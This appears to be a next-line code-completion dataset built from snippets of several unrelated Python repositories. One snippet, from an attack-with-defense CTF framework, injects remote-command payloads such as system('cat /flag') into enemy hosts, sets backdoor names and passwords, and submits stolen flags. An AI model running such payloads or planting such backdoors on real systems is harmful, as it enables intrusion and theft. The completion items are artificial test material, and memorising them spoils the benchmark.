def set_abstraction(self, abstraction):
self.abstraction = abstraction
def get_classes(self):
classes = []
nodes = list(self.nodes.values())
while nodes:
node = nodes.pop(0)
if not node:
break
children = node.get_children()
nodes.extend(children)
if isinstance(node, ClassNode):
classes.append(node)
return classes
def __repr__(self):
return f"<{self.__class__.__name__}:{self.name}>"
def has_node(self, node_name):
return node_name in self.nodes
def add_node(self, node: Node):
self.nodes[node.name] = node
def get_node(self, node_name):
return self.nodes.get(node_name)
def __iter__(self):
for node in self.nodes.values():
yield node
def __eq__(self, component):
if not component:
return False
equal_names = self.name == component.name
for other_node in component:
self_node = self.get_node(other_node.name)
if other_node != self_node:
return False
return equal_names
def __ne__(self, component):
return not self.__eq__(component)
# Path: basel/components/classes.py
class ClassNode(Node):
def __init__(
self,
name: str,
subclasses: Optional[List] = None,
keywords: Optional[Dict] = None,
**kwargs,
):
super().__init__(name, **kwargs)
self.subclasses = subclasses or []
self.keywords = keywords or {}
def __eq__(self, other_node):
if not other_node:
return False
match_names = other_node.name == self.name
match_subclasses = other_node.subclasses == self.subclasses
match_keywords = other_node.keywords == self.keywords
match_children = self.has_children(other_node)
return match_names and match_children and match_keywords and match_subclasses
# Path: basel/components/modules.py
class ModuleNode(Node):
pass
# Path: tests/unit_tests/components/component_test.py
from basel.components import Component
from basel.components.classes import ClassNode
from basel.components.modules import ModuleNode
import pytest
@pytest.mark.parametrize(
"component,expected_classes",
[
(
Component(
name="Componant_A",
nodes=[
| ModuleNode( |
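Component.get_classes in this record is a queue-based breadth-first walk that collects ClassNode instances from a node tree. The same traversal pattern in isolation, over a toy dict tree:

from collections import deque

tree = {"name": "pkg", "children": [
    {"name": "mod", "children": [{"name": "Cls", "children": []}]},
]}

queue, visited = deque([tree]), []
while queue:
    node = queue.popleft()                  # pop from the front, like pop(0)
    visited.append(node["name"])
    queue.extend(node["children"])          # enqueue children
assert visited == ["pkg", "mod", "Cls"]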
====REPOSITORY====
# Repo Name: Gr-1m/AWD-Frame-ByGr1m
# Path: Configs/frame_config.py
FRAME_DIR = _os.path.dirname(_os.path.dirname(__file__))
# Path: Configs/config.py
API_URL = 'http://kaming/awduse/submit.php'
# Path: func/CmdColors.py
def printX(context=None, *args, logtime=True, **kwargs) -> None:
try:
if context[0] == '[' and context[2] == ']':
prompt = context[1].lower()
main_text = context[3:].lstrip()
if prompt == '0':
context = '\x1b[01;30;30m[0]\x1b[0m ' + main_text
elif prompt == '-':
context = '\x1b[01;30;31m[-]\x1b[0m ' + main_text
elif prompt.lower() == 'i':
logtime = logtime or False
context = '\x1b[01;30;32m[i]\x1b[0m ' + main_text
elif prompt.lower() == 'w' or prompt.lower() == '!':
logtime = logtime or False
context = '\x1b[01;30;33m[W]\x1b[0m ' + main_text
elif prompt == '+':
context = '\x1b[01;30;34m[+]\x1b[0m ' + main_text
elif prompt == '*':
context = '\x1b[01;30;35m[*]\x1b[0m ' + main_text
elif prompt.upper() == 'F':
context = '\x1b[01;30;36m[F]\x1b[0m ' + main_text
else:
logtime = logtime or False
context = '\x1b[01;30;37m[!]\x1b[0m ' + main_text
elif context:
context = '\x1b[01;30;38m[?]\x1b[0m ' + context.lstrip()
else:
pass
except IndexError:
context = '\x1b[01;30;37m[E]\x1b[0m ' + f"Log Input Error:{context.lstrip()}"
else:
pass
finally:
if logtime:
context = f"[\x1b[01;30;32m{time.asctime().split()[3]}\x1b[0m] " + context
print(f"{context}", *args, **kwargs)
return None
# Path: modules/Attack.py
from Configs.frame_config import FRAME_DIR
from Configs.config import FlagRegular
from func.CmdColors import printX
from modules.ReplaceStr import *
from urllib.parse import urlparse as URL
import requests, pymysql, paramiko, socket
import hashlib, base64
import os as _os
import re
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@project : customGr1m
@file : Attack.py
@Author : Gr%1m
@Date : 14/11/2023 10:56 am
"""
# from pwn import *
# About Flag
Flags = set()
FlagPath = '/flag'
FlagLen = 41
# Payload INFO
Payloads = {
f"http://POST@{HostReplaceStr}:80/awdtest/testback.php?submit=submit&bb={RceReplaceStr}",
}
WebRootDir = '/var/www/html'
LoginCookie = 'security=low; PHPSESSID=e16f5c982733368120234560b9cb5625'
BDFileName = 'a10uN7yA_1'
BDcmdPass = 'x2aom1ng_20231114'
BDRceParam = 'kAt3l1na'
MemShell = set()
# todo: attack
# Enemy INFO
X = 'x'
def _up_payloads(data):
Payloads.add(data)
def submit_flag(submitAPI, token, flag):
try:
if submitAPI[-1] == 'GET':
url = f'{submitAPI[0]}?{submitAPI[1]}={token}&{submitAPI[2]}={flag}'
res = requests.get(url=url)
elif submitAPI[-1] == 'POST':
res = requests.post(url=submitAPI[0], data={submitAPI[1]: token, submitAPI[2]: flag})
else:
printX("[!] please set SubmitAPI method")
return "No", 400
return res.text, res.status_code
except KeyboardInterrupt:
printX('[-] Interrupt Submit Flag')
return 0, 0
except Exception:
return 0, 0
def _attack_vul(hostname, payload, cmd):
purl = URL(payload)
method, payload = purl.username, payload.split(f'@{HostReplaceStr}')[-1]
payload = payload.replace(RceReplaceStr, cmd)
url = f'http://{hostname}{payload}'
try:
if method == 'GET':
res = requests.get(url=url, headers={'Cookie': LoginCookie})
elif method == 'POST':
params = payload.split('?', maxsplit=1)[-1]
data = {_.split('=', maxsplit=1)[0]: _.split('=', maxsplit=1)[1] for _ in params.split('&')}
res = requests.post(url, data=data, headers={'Cookie': LoginCookie})
else:
printX(f'[-] Not Allow Method in payload {payload}')
raise NameError
except:
class _X:
def __init__(self):
self.text = None
self.status_code = 400
res = _X()
return res, purl
def get_flag(ey_hosts, rce="system('cat /flag');"):
def extract_flag(text):
try:
| flag = re.search(FlagRegular, text).group() |
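printX above parses a leading [x] tag on the message into an ANSI color and optionally prepends a timestamp. Usage implied by that parsing, assuming the repo's func/CmdColors.py is importable (colors only render in an ANSI-capable terminal):

from func.CmdColors import printX

printX("[+] payload stored on target")           # blue [+], timestamped
printX("[-] connection refused")                 # red [-]
printX("[i] 3 targets loaded", logtime=False)    # green [i], no timestamp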
====REPOSITORY====
# Repo Name: Wolfsauge/async_summarize
# Path: sync_helpers.py
def get_length_of_chunk_in_tokens(my_chunk: str, buck_slip: dict) -> int:
my_result = buck_slip["tokenizer"](my_chunk)
input_ids = my_result.input_ids
length_of_chunk_in_tokens = len(input_ids)
return length_of_chunk_in_tokens
# Path: sync_helpers.py
def get_text_splitter(
buck_slip: dict, custom_chunk_size: int, custom_chunk_overlap: int
) -> TextSplitter:
batched_tokenization = buck_slip["use_batched_tokenization"]
if batched_tokenization is True:
text_splitter = RecursiveCharacterTextSplitter.from_huggingface_tokenizer(
tokenizer=buck_slip["tokenizer"],
chunk_size=custom_chunk_size,
chunk_overlap=custom_chunk_overlap,
)
else:
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=custom_chunk_size,
chunk_overlap=custom_chunk_overlap,
length_function=lambda x: get_length_of_chunk_in_tokens(x, buck_slip),
)
return text_splitter
# Path: sync_helpers.py
def grouped(iterable: Iterable[T], number_of_elements=2) -> Iterable[Tuple[T, ...]]:
"""https://stackoverflow.com/a/5389547"""
return zip(*[iter(iterable)] * number_of_elements)
# Path: sync_helpers.py
def find_chunk_pair_with_minimal_size(elements) -> tuple[int, int]:
last_index = len(elements) - 1
min_length = len(elements[0]) + len(elements[1])  # start from the first pair's combined size
min_index = 0
for i, result in enumerate(elements):
if i < last_index:
sum_of_chars = len(result) + len(elements[i + 1])
if sum_of_chars < min_length:
min_length = sum_of_chars
min_index = i
return min_index, min_index + 1
# Path: sync_helpers.py
def find_longest_element_index(elements) -> int:
max_length = 0
max_index = 0
for i, result in enumerate(elements):
if len(result) > max_length:
max_length = len(result)
max_index = i
return max_index
# Path: sync_helpers.py
def calc_custom_chunking_parameters(
length_of_chunk_in_tokens: int, buck_slip: dict
) -> tuple[int, int]:
my_divisor = math.ceil(length_of_chunk_in_tokens / buck_slip["chunk_size"])
my_divisor = power_log(my_divisor)
my_custom_chunk_size = math.ceil(length_of_chunk_in_tokens / my_divisor)
my_custom_chunk_size = math.ceil(my_custom_chunk_size * 1.10)
my_custom_chunk_overlap = math.ceil(my_custom_chunk_size * 0.1)
return my_custom_chunk_size, my_custom_chunk_overlap
# Path: async_helpers.py
import sys
import asyncio
import math
from tqdm.asyncio import tqdm # type: ignore
from icecream import ic # type: ignore
from sync_helpers import (
get_length_of_chunk_in_tokens,
get_text_splitter,
grouped,
find_chunk_pair_with_minimal_size,
find_longest_element_index,
calc_custom_chunking_parameters,
)
async def get_completion(buck_slip: dict, task: str, **kwargs) -> str:
template = buck_slip["jinja2_env"].from_string(buck_slip["prompt_templates"][task])
if task == "summarize":
chunk = kwargs["chunk"]
if isinstance(chunk, str):
my_prompt = template.render(prompt=chunk)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
elif task == "merge":
first_element = kwargs["first_element"]
second_element = kwargs["second_element"]
if isinstance(first_element, str) and isinstance(second_element, str):
my_prompt = template.render(
first_element=first_element, second_element=second_element
)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
bad_counter = 0
attempt_counter = 0
while attempt_counter <= buck_slip["max_completion_retries"]:
my_temperature = buck_slip["temperature"] + attempt_counter * 0.1
completion = await buck_slip["api_client"].completions.create(
model=buck_slip["model_local_identifier"],
prompt=my_prompt,
max_tokens=buck_slip["max_tokens"],
temperature=my_temperature,
)
attempt_counter += 1
finish_reason = completion.choices[0].finish_reason
if finish_reason == "stop":
break
bad_counter += 1
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: finish_reason != 'stop', retrying.")
if bad_counter >= buck_slip["max_completion_retries"]:
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: aborting after multiple failed attempts.")
sys.exit(1)
return completion.choices[0].text
async def do_chunking_step(my_chunk: str, buck_slip: dict) -> list:
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
chunks = buck_slip["text_splitter"].split_text(my_chunk)
tqdm.write(f"Released {lock}.")
return chunks
async def merge_elements(elements, buck_slip: dict, pindex: int) -> tuple[str, int]:
first_element, second_element = elements
intermediate_merge_result = await get_completion(
buck_slip, "merge", first_element=first_element, second_element=second_element
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def summarize_element(chunk, buck_slip: dict, pindex: int) -> tuple[str, int]:
intermediate_merge_result = await get_completion(
buck_slip, "summarize", chunk=chunk
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def split_further(partial_results: list, my_pos: int, buck_slip: dict) -> list:
ic("Split further.")
ic(my_pos)
ic(len(partial_results))
my_len_list = [len(_) for _ in partial_results]
ic(my_len_list)
my_chunk = partial_results[my_pos]
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
length_of_chunk_in_tokens = get_length_of_chunk_in_tokens(my_chunk, buck_slip)
tqdm.write(f"Released {lock}.")
my_custom_chunk_size = length_of_chunk_in_tokens
my_custom_chunk_overlap = 0
| buck_slip["text_splitter"] = get_text_splitter( |
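The grouped helper above relies on the zip(*[iter(iterable)] * n) idiom: zip pulls alternately from the same iterator object, so each output tuple consumes n consecutive elements.

it = iter(range(6))
pairs = list(zip(it, it))        # the same iterator twice, not two copies
assert pairs == [(0, 1), (2, 3), (4, 5)]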
====REPOSITORY====
# Repo Name: balazsborsos/dae_postprocessing
# Path: utils/parser.py
class ConfigurationParser:
def __init__(self):
self.parser = argparse.ArgumentParser(description='Script for training or evaluation with configuration.')
# Argument to specify mode (train or evaluation)
self.parser.add_argument('mode', choices=['train', 'evaluation'], help='Mode: train or evaluation')
# Argument to specify the path to the configuration YAML file
self.parser.add_argument('-t', '--config', type=str, required=True, help='Path to the configuration file')
# Argument to specify the path to the data
self.parser.add_argument('-i', '--input', type=str, required=True, help='Path to the input data')
def parse_args(self):
return self.parser.parse_args()
# Path: utils/parser.py
def parse_yaml_config(file_path: Path) -> dict:
with open(file_path, 'r') as config_file:
config_data = yaml.load(config_file, Loader=yaml.FullLoader)
return config_data
# Path: train.py
def train_model(config: dict, data_path: Path):
model_dir = config["store_model_to"]
print('Model directory: ', model_dir)
# custom parameters set in yaml file
training_params = config["training_configuration"]
# callback and logger
callbacks = [
ModelCheckpoint( # saves weights for every n epochs
dirpath=Path(model_dir, "checkpoint"),
filename='weights.epoch{epoch:03}-val_denoise_dice_{val_denoise_dice:.4f}',
save_top_k=-1,
auto_insert_metric_name=False,
save_weights_only=False,
every_n_epochs=5,
)
]
loggers = [
TensorBoardLogger(
save_dir=model_dir,
name='board',
version=''
),
]
# model
model = get_model(**training_params)
# data
train_dataloader = get_dataloader(
data_path,
mlset="training",
**training_params
)
val_dataloader = get_dataloader(
data_path,
mlset="validation",
**training_params
)
# training
trainer = pl.Trainer(
logger=loggers,
callbacks=callbacks,
max_epochs=training_params["max_epochs"],
gpus=training_params.get("gpus", 1),
auto_select_gpus=True,
strategy=training_params.get("strategy", None),
gradient_clip_val=0.5,
log_every_n_steps=5
)
trainer.fit(
model,
train_dataloaders=train_dataloader,
val_dataloaders=val_dataloader,
)
# Path: main.py
from utils.parser import ConfigurationParser, parse_yaml_config
from train import train_model
if __name__ == "__main__":
config_parser = ConfigurationParser()
args = config_parser.parse_args()
| config = parse_yaml_config(args.config) |
====REPOSITORY====
# Repo Name: htyao89/Textual-based_Class-aware_prompt_tuning
# Path: clip/model.py
def build_model(state_dict: dict):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith("transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers
)
for key in ["input_resolution", "context_length", "vocab_size"]:
if key in state_dict:
del state_dict[key]
convert_weights(model)
model.load_state_dict(state_dict)
return model.eval()
# Path: clip/simple_tokenizer.py
class SimpleTokenizer(object):
def __init__(self, bpe_path: str = default_bpe()):
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
merges = gzip.open(bpe_path).read().decode("utf-8").split('\n')
merges = merges[1:49152-256-2+1]
merges = [tuple(merge.split()) for merge in merges]
vocab = list(bytes_to_unicode().values())
vocab = vocab + [v+'</w>' for v in vocab]
for merge in merges:
vocab.append(''.join(merge))
vocab.extend(['<|startoftext|>', '<|endoftext|>'])
self.encoder = dict(zip(vocab, range(len(vocab))))
self.decoder = {v: k for k, v in self.encoder.items()}
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {'<|startoftext|>': '<|startoftext|>', '<|endoftext|>': '<|endoftext|>'}
self.pat = re.compile(r"""<\|startoftext\|>|<\|endoftext\|>|'s|'t|'re|'ve|'m|'ll|'d|[\p{L}]+|[\p{N}]|[^\s\p{L}\p{N}]+""", re.IGNORECASE)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token[:-1]) + ( token[-1] + '</w>',)
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key = lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
except:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
self.cache[token] = word
return word
def encode(self, text):
bpe_tokens = []
text = whitespace_clean(basic_clean(text)).lower()
for token in re.findall(self.pat, text):
token = ''.join(self.byte_encoder[b] for b in token.encode('utf-8'))
bpe_tokens.extend(self.encoder[bpe_token] for bpe_token in self.bpe(token).split(' '))
return bpe_tokens
def decode(self, tokens):
text = ''.join([self.decoder[token] for token in tokens])
text = bytearray([self.byte_decoder[c] for c in text]).decode('utf-8', errors="replace").replace('</w>', ' ')
return text
# Path: clip/clip.py
import hashlib
import os
import urllib
import warnings
import torch
from typing import Any, Union, List
from pkg_resources import packaging
from PIL import Image
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize
from tqdm import tqdm
from .model import build_model
from .simple_tokenizer import SimpleTokenizer as _Tokenizer
from torchvision.transforms import InterpolationMode
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
if packaging.version.parse(torch.__version__) < packaging.version.parse("1.7.1"):
warnings.warn("PyTorch version 1.7.1 or higher is recommended")
__all__ = ["available_models", "load", "tokenize"]
| _tokenizer = _Tokenizer() |
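build_model above reconstructs the CLIP architecture purely from checkpoint tensor shapes and key names; for instance, transformer depth is recovered by counting distinct residual-block indices:

# How build_model recovers transformer depth from key names alone.
state_dict_keys = [
    "transformer.resblocks.0.attn.in_proj_weight",
    "transformer.resblocks.1.attn.in_proj_weight",
    "transformer.resblocks.1.mlp.c_fc.weight",   # same block, counted once
]
layers = len(set(k.split(".")[2] for k in state_dict_keys
                 if k.startswith("transformer.resblocks")))
assert layers == 2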
====REPOSITORY====
# Repo Name: Veridise/vanguard-aleo
# Path: vanguard/aleo/common.py
def get_ifg_edges(prog, func, hash=False, call=False, inline=False):
"""Get information flow graph edges.
Args:
- prog:
- func
- hash (default: False): whether to treat a hash function call directly as an edge
- call (default: False): whether to treat a call directly as an edge
- inline (default: False): whether to inline call invocations recursively to generate edges;
if `call` is True, this argument is then overridden and no inlining will take place.
Rets: A list of pairs of strings
"""
node = prog.functions[func]
assert_node_field(node, "instructions")
edges = []
# process instructions
for inst in node["instructions"] + node["outputs"]:
tokens = trim_inst(inst["str"]).split()
match tokens:
case ["is.eq", o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case ["is.neq", o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case ["assert.eq", o1, o2]:
edges.append((o1, o2))
edges.append((o2, o1))
case ["assert.neq", o1, o2]:
edges.append((o1, o2))
edges.append((o2, o1))
case ["cast", o, "into", r, "as", d]:
edges.append((o, r))
case ["call", *ts]:
# manually match the call component since there are two sequences of varying lengths
idx_into = tokens.index("into")
f = tokens[1]
os = tokens[2:idx_into]
rs = tokens[idx_into+1:]
if call:
for o in os:
for r in rs:
# overapproximated edges from every o to every r
edges.append((o, r))
elif inline:
# TODO: add impl
raise NotImplementedError
else:
# no inline, no call, then no edge
pass
case ["async", *ts]:
# FIXME: can't find official documentation for now, treated as call
# manualy match the call component since there are two sequences of varying lengths
idx_into = tokens.index("into")
f = tokens[1]
os = tokens[2:idx_into]
rs = tokens[idx_into+1:]
if call:
for o in os:
for r in rs:
# overapproximated edges from every o to every r
edges.append((o, r))
elif inline:
# TODO: add impl
raise NotImplementedError
else:
# no inline, no call, then no edge
pass
case [cop, o1, o2, "into", r, "as", t] if cop.startswith("commit"):
# no edge in commitment computation
pass
case [hop, o1, "into", r, "as", t] if hop.startswith("hash"):
# no edge in hash computation
pass
case [binop, o1, o2, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
case [unop, o, "into", r]:
edges.append((o, r))
case [terop, o1, o2, o3, "into", r]:
edges.append((o1, r))
edges.append((o2, r))
edges.append((o3, r))
case ["cast", *os, "into", dst, "as", typ]:
for o in os:
edges.append((o, dst))
case ["output", o, "as", typ]:
# no edge in output command
pass
case _:
raise NotImplementedError(f"Unknown instruction pattern, got: {inst['str']}")
return edges
# Path: vanguard/aleo/common.py
def trim_inst(inst: str):
# remove space in "; " in array literals
# remove tailing semi-colon ";"
return inst.replace("; ", ";").strip(";")
# Path: vanguard/aleo/detectors/infoleak.py
import networkx as nx
from ..common import get_ifg_edges, trim_inst
def detector_infoleak(prog, func):
"""Detect for information leak
Args:
- prog:
- func:
Rets: (result, info)
"""
| edges = get_ifg_edges(prog, func, hash=False, call=True, inline=False) |
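Given the edge list from get_ifg_edges, an information-leak check reduces to reachability in a directed graph. A hedged sketch of that idea with networkx; the register names and the private/public split below are hypothetical, not the repo's actual detector logic:

import networkx as nx

edges = [("r0", "r2"), ("r1", "r2"), ("r2", "out0")]   # hypothetical IFG
graph = nx.DiGraph(edges)

private_inputs, outputs = {"r0"}, {"out0"}
leaks = [(src, dst) for src in private_inputs for dst in outputs
         if nx.has_path(graph, src, dst)]
print(leaks)                                           # -> [('r0', 'out0')]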
====REPOSITORY====
# Repo Name: winrey/x-following
# Path: client.py
class MyUser(TypedDict):
class TimelineUserEntitiesDescription(TypedDict):
class TimelineUserEntitiesURL(TypedDict):
class TimelineUserEntities(TypedDict):
class TimelineUserLegacy(TypedDict):
class TimelineUser(TypedDict):
class FollowingUser(TimelineUser, TimelineUserLegacy, TypedDict):
class TwitterClient:
def __init__(self, authorization_token, cookie_value, csrf_token):
def get_auth_headers(self, referer='https://twitter.com/'):
def get_multi_user_info(self) -> List[MyUser]:
def set_current_user_info(self, user: MyUser):
def get_current_user_info(self) -> MyUser:
def _get_user_list_by_graphql(self, url, referer, max, cursor):
def user_valid(user) -> bool:
def map_entry_to_user(user) -> FollowingUser:
def get_following_by_graphql(self, max=20, cursor="") -> Tuple[List[FollowingUser], str]:
def get_all_following_by_graphql(self, singe_max=50) -> List[FollowingUser]:
def get_followers_by_graphql(self, max=20, cursor=""):
def get_all_followers_by_graphql(self, singe_max=50) -> List[FollowingUser]:
def unfollow(self, following: FollowingUser):
# Path: common_cli.py
def select_account():
users = client.get_multi_user_info()
choice = 0
if len(users) > 1:
print("Select Account:")
for idx, user in enumerate(users):
print(f"{idx+1}. {user['screen_name']}")
choice = input("Which Account? Please input the number: ")
choice = int(choice) - 1
client.set_current_user_info(users[choice])
# Path: common_cli.py
def trials(subjects: List[FollowingUser]):
length = len(subjects)
for idx, subject in enumerate(subjects):
# clear screen
os.system('clear')
print(f"\n\t\t\t{f'Here is the {idx+1}/{length} subject:'}")
print(f"\n\n{center_text(LINE_STR)}\n\n")
trial_single(subject)
# Path: back_white_list.py
WHITELIST_PATH = 'cache/whitelist.json'
BLACKLIST_PATH = 'cache/blacklist.json'
def use_list(path: str):
def load_list() -> List[FollowingUser]:
def save_list(following: FollowingUser):
def filter_not_in_list(followings: List[FollowingUser]):
def is_in_whitelist(following: FollowingUser):
# Path: check_following.py
import json
from typing import List
from client import client, FollowingUser
from common_cli import select_account, trials
from back_white_list import filter_not_in_whitelist, filter_not_in_blacklist
FOLLOWING_CACHE_PATH = 'cache/followings.json'
def load_followings():
try:
with open(FOLLOWING_CACHE_PATH, 'r') as f:
return json.load(f)
except FileNotFoundError:
return False
def get_all_followings(force_update=False):
followings = load_followings()
if followings and not force_update:
return followings
followings = client.get_all_following_by_graphql(50)
print("saving followings...")
with open('cache/followings.json', 'w') as f:
json.dump(followings, f)
return followings
def filter_one_way_followings(followings: List[FollowingUser]):
one_way_followings = []
for following in followings:
if "followed_by" not in following or not following["followed_by"]:
one_way_followings.append(following)
return one_way_followings
def is_public_account(following: FollowingUser):
if following["verified"]:
return True
followers_count = following.get("followers_count", 0)
following_count = following.get("following_count", 0)
if following_count < 100 and followers_count > 2000:
return True
if following_count == 0:
return False
return followers_count / following_count > 30
def filter_not_public_accounts(followings: List[FollowingUser]):
return [following for following in followings if not is_public_account(following)]
def main_trails():
select_account()
followings = get_all_followings()
subjects = filter_one_way_followings(followings)
subjects = filter_not_public_accounts(subjects)
subjects = filter_not_in_whitelist(subjects)
subjects = filter_not_in_blacklist(subjects)
| trials(subjects) |
====REPOSITORY====
# Repo Name: Shritesh99/strawberry-django-social-auth
# Path: gql_social_auth/decorators.py
def social_auth(f):
"""
Decorator for getting the social user. Use this decorator if you want to customize the SocialAuthMixin.
:param f: Input: SocialAuthInput(provider, accessToken)
:return: function with two additional arguments
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@psa
@wraps(f)
def wrapper(cls, info, _input, social_user, errors, **kwargs):
def on_resolve(payload):
payload.social_user = social_user
payload.errors = errors
return payload
result = f(cls, info, _input, social_user, errors, **kwargs)
if is_thenable(result):
return Promise.resolve(result).then(on_resolve)
return on_resolve(result)
return wrapper
# Path: gql_social_auth/types.py
class SocialAuthInput:
provider: str
access_token: str
# Path: gql_social_auth/types.py
class SocialType(ObtainJSONWebTokenType):
uid: Optional[str] = strawberry.field(
description="User's uid", default=None)
avatar: Optional[str] = strawberry.field(
description="User's Avarar's URL", default=None)
provider: Optional[str] = strawberry.field(
description="OAUTH provider", default=None)
extra_data: Optional[SocialJSON] = strawberry.field(
description="Extra data requested from user",
resolver=resolve_extra_data)
@classmethod
def from_social_user(cls, social_user) -> "SocialType":
"""
Creates a new token and possibly a new refresh token based on the user.
"""
ret = SocialType(
success=True,
user=cast(UserType, social_user),
token=TokenType.from_user(social_user),
uid=social_user.social_user.uid,
provider=social_user.social_user.provider,
)
if hasattr(settings, 'SOCIAL_AUTH_PIPELINE') and 'gql_social_auth.pipeline.get_avatar' in settings.SOCIAL_AUTH_PIPELINE:
ret.avatar = social_user.avatar
if app_settings.JWT_LONG_RUNNING_REFRESH_TOKEN:
ret.refresh_token = cast(RefreshTokenType, RefreshToken.from_user(social_user))
return ret
# Path: gql_social_auth/mixins.py
from strawberry.types import Info
from gqlauth.user.resolvers import BaseMixin
from .decorators import social_auth
from .types import SocialAuthInput
from .types import SocialType
class SocialAuthMixin(BaseMixin):
"""Social Auth takes OAuth Provider and OAuth Access Token
Allows the user to perform social auth for the given OAuth provider and OAuth access token
:returns
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@classmethod
| @social_auth |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Scholar01/ComfyUI-Keyframe
# Path: keyframe/util.py
def is_injected_model(model):
return hasattr(model, KEYFRAME_INJECTED_ATTR)
# Path: keyframe/util.py
def get_injected_model(model):
return getattr(model, KEYFRAME_INJECTED_ATTR)
# Path: keyframe/util.py
def generate_sigmas(real_model, x, origin_sigmas, scheduler, steps, part_group, device):
batch_size = x.shape[0]
new_sigmas = origin_sigmas.unsqueeze(0).repeat(batch_size, 1)
for part in part_group:
if part.denoise is None or part.denoise > 0.9999:
new_sigmas[part.batch_index] = calculate_sigmas_scheduler(real_model, scheduler, steps).to(device)
else:
new_steps = int(steps / part.denoise)
sigmas = calculate_sigmas_scheduler(real_model, scheduler, new_steps).to(device)
new_sigmas[part.batch_index] = sigmas[-(steps + 1):]
return new_sigmas
# Path: keyframe/util.py
def generate_noise(model_wrap, sigmas, noise):
if max_denoise(model_wrap, sigmas):
n = noise * torch.sqrt(1.0 + sigmas[0] ** 2.0)
else:
n = noise * sigmas[0]
return n
# Path: keyframe/util.py
def get_ancestral_step(sigma_from: torch.Tensor, sigma_to: torch.Tensor, eta: float = 1.) -> (
torch.Tensor, torch.Tensor):
if not eta:
return sigma_to, torch.zeros_like(sigma_to)
sigma_up = torch.min(sigma_to,
eta * (sigma_to ** 2 * (sigma_from ** 2 - sigma_to ** 2) / sigma_from ** 2) ** 0.5)
sigma_down = (sigma_to ** 2 - sigma_up ** 2) ** 0.5
return sigma_down, sigma_up
# Path: keyframe/samples.py
import torch
import comfy.samplers
from tqdm.auto import trange
from comfy.k_diffusion import sampling as k_diffusion_sampling
from comfy.k_diffusion.sampling import to_d, default_noise_sampler
from .util import is_injected_model, get_injected_model, generate_sigmas, generate_noise, get_ancestral_step
CUSTOM_SAMPLERS = [
'k_euler', 'k_euler_a', 'k_lcm'
]
def inject_samples():
comfy.samplers.SAMPLER_NAMES.extend(CUSTOM_SAMPLERS)
k_diffusion_sampling.sample_k_euler = sample_k_euler
k_diffusion_sampling.sample_k_euler_a = sample_k_euler_a
k_diffusion_sampling.sample_k_lcm = sample_k_lcm
print(f'Injected samplers: {CUSTOM_SAMPLERS}')
def get_sigmas_noise(model_wrap, x, noise, latent_image, sigmas, scheduler, steps, part_group):
| sigmas = generate_sigmas(model_wrap.inner_model, x, sigmas, scheduler, steps, part_group, sigmas.device) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Hamidrezaostadabbas/FOSS4G_Asia_2023
# Path: 03_Exercise_2/exercise_2/layout_generator/layout_generator_dialog.py
class LayoutGeneratorDialog(QtWidgets.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
